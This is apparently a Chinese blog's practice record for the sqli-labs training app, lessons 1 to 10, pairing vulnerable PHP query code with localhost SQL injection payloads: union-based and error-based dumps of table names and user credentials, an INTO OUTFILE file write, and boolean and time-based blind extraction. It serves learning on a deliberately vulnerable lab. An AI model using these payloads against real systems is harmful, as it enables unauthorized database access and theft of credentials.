SQLI-LAB 的 实战记录(Less 1 - Less 10)

  • Less - 1 Error Based- String
    • Test
    • Sourse Code
    • Solution
  • Less - 2 Error Based- Intiger
    • Test
    • Sourse Code
    • Solution
  • Less - 3 Error Based- String with Twist
    • Test
    • Sourse Code
    • Solution
  • Less - 4 Error Based- DoubleQuotes String
    • Test
    • Sourse Code
    • Solution
  • Less - 5 Double Query- Single Quotes- String
    • Test
    • Sourse Code
    • Solution
  • Less - 6 Double Query- Double Quotes- String
    • Test
    • Sourse Code
    • Solution
  • Less - 7 Dump into Outfile
    • Test
    • Sourse Code
    • Solution
  • Less - 8 Blind- Boolian- Single Quotes- String
    • Test
    • Sourse Code
    • Solution
  • Less - 9 Blind- Time based- Single Quotes- String
    • Test
    • Sourse Code
    • Solution
  • Less - 10 Blind- Time based- Double Quotes- String
    • Test
    • Sourse Code
    • Solution

以下内容 只是 本人 在做 sqli-lab 练习时 写下的记录,仅供参考。
因为本人学过一些sql注入的内容,所以大部分内容是没有讲解的,如有不清楚的地方,请自行使用搜索引擎查询,相信会得到所需的内容。

Less - 1 Error Based- String

(第1节:基于错误 – 字符串)

字符型注入,也即是通过Get或者Post方式传进去的数据被单引号或者双引号包裹住

Test:

    http://localhost/sqli-lab/Less-1/index.php?id=2'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”2” LIMIT 0,1’ at line 1
注: 报错中limit前面的是 ‘2” 对比URL上的 2’,可推断,php的sql语句中 $id 可能被 单引号 包裹

Sourse Code:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
 } else {
    print_r(mysql_error());
}

注:id被单引号包裹;不报错的时候,会显示username和password这两个位置的内容

Solution:

' or '1'='1
    http://localhost/sqli-lab/Less-1/index.php?id=1' or '1'='1

'  --+
    http://localhost/sqli-lab/Less-1/index.php?id= 1'  --+

     其它:

    http://localhost/sqli-lab/Less-1/index.php?id=0' union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-1/index.php?id= ' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' or '1

    http://localhost/sqli-lab/Less-1/index.php?id=0 ' union select 1,group_concat(username),group_concat(password) from security.users --+

Less - 2 Error Based- Intiger

(第2课:基于错误 – 数字型)

Test:

    http://localhost/sqli-lab/Less-2/index.php?id=2"/

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”/ LIMIT 0,1’ at line 1
注: 报错中limit前面的是 “/ 和URL上的一样,可推断,php的sql语句中 $id 可能没有被其它符号包裹

Sourse Code:

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}else{
    print_r(mysql_error());
}

注:id被双引号包裹;不报错的时候,会显示username和password这两个位置的内容

Solution:

or 1=1
     http://localhost/sqli-lab/Less-2/index.php?id= 1 or 1=1

or 1=1 --
    http://localhost/sqli-lab/Less-2/index.php?id= 1 or 1=1 --

--+
    http://localhost/sqli-lab/Less-2/index.php?id= 1 --+

     其它:

    http://localhost/sqli-lab/Less-2/index.php?id= 0 union select 1,version(),database()

    http://localhost/sqli-lab/Less-2/index.php?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'

    http://localhost/sqli-lab/Less-2/index.php?id=0 union select 1,group_concat(username),group_concat(password) from security.users

    补充:

暴用户名、版本号、库名和路径
    http://localhost/sqli-lab/Less-2/index.php?id=0  union select 1,2,group_concat(user(),0x5e5e,version(),0x5e5e,database(),0x5e5e,@@basedir) --+

暴所在库的所有表名
    http://localhost/sqli-lab/Less-2/index.php?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

暴列名
    http://localhost/sqli-lab/Less-2/index.php?id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

暴username和password的内容
    http://localhost/sqli-lab/Less-2/index.php?id=0 union select 1,group_concat(username,0x5e,password),3 from users --

Less - 3 Error Based- String (with Twist)

(第3课:基于错误- 字符串(变形))

Test:

http://localhost/sqli-lab/Less-3/index.php?id=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”1”) LIMIT 0,1’ at line 1

http://localhost/sqli-lab/Less-3/index.php?id=1' or 1=1

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”) LIMIT 0,1’ at line 1
注:报错中出现 ‘) 推断SQL语句中 应有 (‘$id’)存在

Sourse Code:

$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'Your Login name:'. $row['username'];
    echo 'Your Password:' .$row['password'];
}else{
    print_r(mysql_error());
}

注:被(”) 包裹

Solution:

') or '1'=('1
     http://localhost/sqli-lab/Less-3/index.php?id=1 ') or '1'=('1

) or 1=1 --+
     http://localhost/sqli-lab/Less-3/index.php?id=1) or 1=1 --+

     其它:

    http://localhost/sqli-lab/Less-3/index.php?id=0') union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-3/index.php?id=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security" --+

    http://localhost/sqli-lab/Less-3/index.php?id=0') union select 1,group_concat(username),group_concat(password) from security.users --+

Less - 4 Error Based- DoubleQuotes String

(第4课:基于错误 - 双引号 字符串)

Test:

    http://localhost/sqli-lab/Less-4/index.php?id=2"/
 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '") LIMIT 0,1' at line 1
 注: 报错中limit前面的是 ") 对比URL上的 2"/,可推断,php的sql语句中 $id 是被 双引号和一层括号 包裹

Sourse Code:

$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
      echo "";
      echo 'Your Login name:'. $row['username'];
      echo "
"
; echo 'Your Password:' .$row['password']; echo "
"; }else{ echo ''; print_r(mysql_error()); echo ""; }

注:加了一层双引号和括号

Solution:

")or ("1")=("1
    http://localhost/sqli-lab/Less-4/index.php?id=1")or ("1")=("1

")or 1=1 --+
    http://localhost/sqli-lab/Less-4/index.php?id=1")or 1=1 --+

     其它:

    http://localhost/sqli-lab/Less-4/index.php?id=0") union select 1,version(),database() --+

    http://localhost/sqli-lab/Less-4/index.php?id=0") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema="security" --+

    http://localhost/sqli-lab/Less-4/index.php?id=0") union select 1,group_concat(username),group_concat(password) from security.users --+

Less - 5 Double Query- Single Quotes- String

(第5课:双注入 - 单引号 - 字符串)

Test:

    http://localhost/sqli-lab/Less-5/index.php?id=2"/

注:未报错,只显示 You are in………..

    http://localhost/sqli-lab/Less-5/index.php?id=2'"' --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘”’ – ’ LIMIT 0,1’ at line 1
注:能正常报错,考虑使用报错来获取信息,同时 limit前为 “’–’ 可以推断 $id是用单引号包裹的

双注入查询需要四个函数/语句
1. Rand() //随机函数
2. Floor() //取整函数
3. Count() //汇总函数
4. Group by clause //分组语句
双注入的原理,简单一句话原理就是有研究人员发现,当在一个聚合函数,比如count函数后面如果使用分组语句(group by)就会把查询的一部分以错误的形式显示出来“通过floor报错的方法来爆数据的本质是group by语句的报错。group by语句报错的原因是floor(random(0)*2)的不确定性,即可能为0也可能为1(group by key的原理是循环读取数据的每一行,将结果保存于临时表中。读取每一行的key时,如果key存在于临时表中,则不在临时表中则更新临时表中的数据;如果该key不存在于临时表中,则在临时表中插入key所在行的数据。group by floor(random(0)*2)出错的原因是key是个随机数,检测临时表中key是否存在时计算了一下floor(random(0)*2)可能为0,如果此时临时表只有key为1的行不存在key为0的行,那么数据库要将该条记录插入临时表,由于是随机数,插时又要计算一下随机值,此时floor(random(0)*2)结果可能为1,就会导致插入时冲突而报错。即检测时和插入时两次计算了随机数的值。具体原理参考:http://www.mysqlops.com/2012/05/15/mysql-sql-analyze.html)。”

Sourse Code:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'You are in...........';
}else{
    print_r(mysql_error());
}

注:$id被单引号包围,URL正确时除可能知道格式外,无法获取其它信息;错误时有正常报错,可以考虑从报错入手

Solution:

' union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    其它:

    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select count(*),0,concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select count(*),0,concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    版本号::数据库名::用户名
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    表名
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name),0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    列名
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    行数
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第一行的用户名和密码
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第二行的用户名和密码
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第三行的用户名和密码
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第四行的用户名和密码
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 3,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第五行的用户名和密码
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 4,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第六行的用户名和密码
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 5,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第七行的用户名和密码
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 6,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    第八行的用户名和密码
    http://localhost/sqli-lab/Less-5/index.php?id= 0' union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 7,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

注:如果没有现成的注入语句,建议使用mysql逐步测试出可用的语句


Less - 6 Double Query- Double Quotes- String

(第6课:双注入 - 双引号 - 字符串)

Test:

    http://localhost/sqli-lab/Less-6/index.php?id=2'"' --+

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” – ” LIMIT 0,1’ at line 1
注: 能正常报错, limit前是 ’ – ” ,推断 $id 是被双引号包裹

Sourse Code:

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){   
    echo 'You are in...........';
}else{
    print_r(mysql_error());
}

注:$id被双引号包围,URL正确时除可能知道格式外,无法获取其它信息;错误时有正常报错,可以考虑从报错入手

Solution:

" union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less6/index.php?id= 0" union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

     其它:

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select count(*),0,concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select count(*),0,concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select count(*),0,concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a limit 0,10 --+


    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a) limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select 1,2,3 from (select count(*),concat((select concat(group_concat(table_name) ,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select 1,2,3 from (select count(*),concat((select concat(group_concat(column_name) ,0x3a,0x3a) from information_schema.columns wheretable_schema=database() and table_name='users' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select 1,2,3 from (select count(*),concat((select concat(count(*),0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

    http://localhost/sqli-lab/Less-6/index.php?id= 0" union select 1,2,3 from (select count(*),concat((select concat(username,0x3a, 0x3a,password,0x3a, 0x3a) from security.users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

Less - 7 Dump into Outfile

(第7课:转储文件)

Test:

    http://localhost/sqli-lab/Less-7/index.php?id=2

You are in…. Use outfile……
注:和之前一样 正常时除可能的格式和提示的使用 outfile以外,无其它有效信息

    http://localhost/sqli-lab/Less-7/index.php?id=2' --+

You have an error in your SQL syntax
注:得不到详细的报错

    http://localhost/sqli-lab/Less-7/index.php?id=2')) --+

注:正常,$id周围 应是单引号和双层括号

Sourse Code:

$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'You are in.... Use outfile......';
}else{
    echo 'You have an error in your SQL syntax'; 
}

注:$id被双层括号和单引号包围,URL正确时有提示 用outfile,错误时只知有错误

Solution:

2')) union select 1,2,3 into outfile  "F:\\666.txt" --+

     http://localhost/sqli-lab/Less-7/index.php?id=2')) union select 1,2,3 into outfile  "F:\\666.txt" --+

     其它:

    http://localhost/sqli-lab/Less-7/index.php?id=2')) union select username,'~~',password from users into outfile  "F:\\666.txt" --+

Less - 8 Blind- Boolian- Single Quotes- String

(第8课:盲注 - 基于布尔值 - 单引号 - 字符串)

Test:

    http://localhost/sqli-lab/Less-8/index.php?id=2'

注:什么都没有显示,加上括号也不行

    http://localhost/sqli-lab/Less-8/index.php?id=2' --+

You are in………..
注:根据前几次的经验,这句话说明 能查出,没有报错,那么之前那个估计是错了

    http://localhost/sqli-lab/Less-8/index.php?id=2"

You are in………..
注:没报错,双引号加上或改成括号也都没错,看来$id是被单引号圈着了
因为除了对错什么都判断不出来,所以考虑构造只需判断对错的语句,盲注

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,1,1))) < 116 --+

注:正确。substr(待截断的字符串,开始位置,截断长度)

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,1,1))) < 115 --+

注:没显示,则这是错的,对照ascii,也说明 数据库第一个字符是 小写的s

Sourse Code:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
      echo 'You are in...........';
}else{
}

Solution:

2' and (ascii(substr((select database()) ,1,1))) = 115 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,1,1))) = 115 --+

     其它:

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (length(database())) = 8 --+

注:数库名长度=8

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,1,1))) = 115 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,2,1))) = 101 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,3,1))) = 99 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,4,1))) = 117 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,5,1))) = 114 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,6,1))) = 105 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,7,1))) = 116 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select database()) ,8,1))) = 121 --+  

注:数据库名 security

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) = 101 --+

注:第一张表 表名长度=6,第一个字符是 e

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (length((select table_name from information_schema.tables where table_schema=database() limit 3,1))) = 5 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 117 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,2,1))) = 115 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,3,1))) = 101 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,4,1))) = 114 --+

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,5,1))) = 115 --+

注:第四张表是users

    http://localhost/sqli-lab/Less-8/index.php?id=2' and (ascii(substr((select username from users limit 0,1) ,1,1))) = 68 --+

注:users表第一行 的username 第一个字母 D

Less - 9 Blind- Time based- Single Quotes- String

(第9课:盲注 - 基于时间 - 单引号 - 字符串)

Test:

    http://localhost/sqli-lab/Less-9/index.php?id=2
    http://localhost/sqli-lab/Less-9/index.php?id=2'
    http://localhost/sqli-lab/Less-9/index.php?id=2"
    http://localhost/sqli-lab/Less-9/index.php?id=2')

都只显示 You are in………..这情况八成是要盲注,仅单纯的布尔值是不行了
(感谢这道题在提示是基于时间的。。。)

Sourse Code:

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
      echo 'You are in...........';
}else{
    echo 'You are in...........';
}

Solution:

    http://localhost/sqli-lab/Less-9/index.php?id=1'+and+if(1=1, sleep(1), null)+ --+

注:说明 and 前面是对的,会停1秒   

     其它:

    http://localhost/sqli-lab/Less-9/index.php?id=2' and (length(database())) = 8 +and+if(1=1, sleep(1), null)+ --+

    http://localhost/sqli-lab/Less-9/index.php?id=2' and (ascii(substr((select database()) ,1,1))) = 115 +and+if(1=1, sleep(1), null)+ --+

Less - 10 Blind- Time based- Double Quotes- String

(第10课:盲注 - 基于时间 - 双引号 - 字符串)

Test:

    http://localhost/sqli-lab/Less-10/index.php?id=2' and (length(database())) = 8 +and+if(1=1, sleep(1), null)+ --+

注:这个跳得挺快的,and前面是写错了

     http://localhost/sqli-lab/Less-10/index.php?id=2" and (length(database())) = 8 +and+if(1=1, sleep(1), null)+ --+

注:这个对了

Sourse Code:

$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo 'You are in...........';
}else{
    echo 'You are in...........';
}

Solution:

2" and (length(database())) = 8 +and+if(1=1, sleep(1), null)+ --+

    http://localhost/sqli-lab/Less-10/index.php?id=2" and (length(database())) = 8 +and+if(1=1, sleep(1), null)+ --+ 

     其它:

    http://localhost/sqli-lab/Less-10/index.php?id=2" and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 --+

    http://localhost/sqli-lab/Less-10/index.php?id=2" and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 +and+if(1=1, sleep(1), null)+ --+

你可能感兴趣的:(sql注入)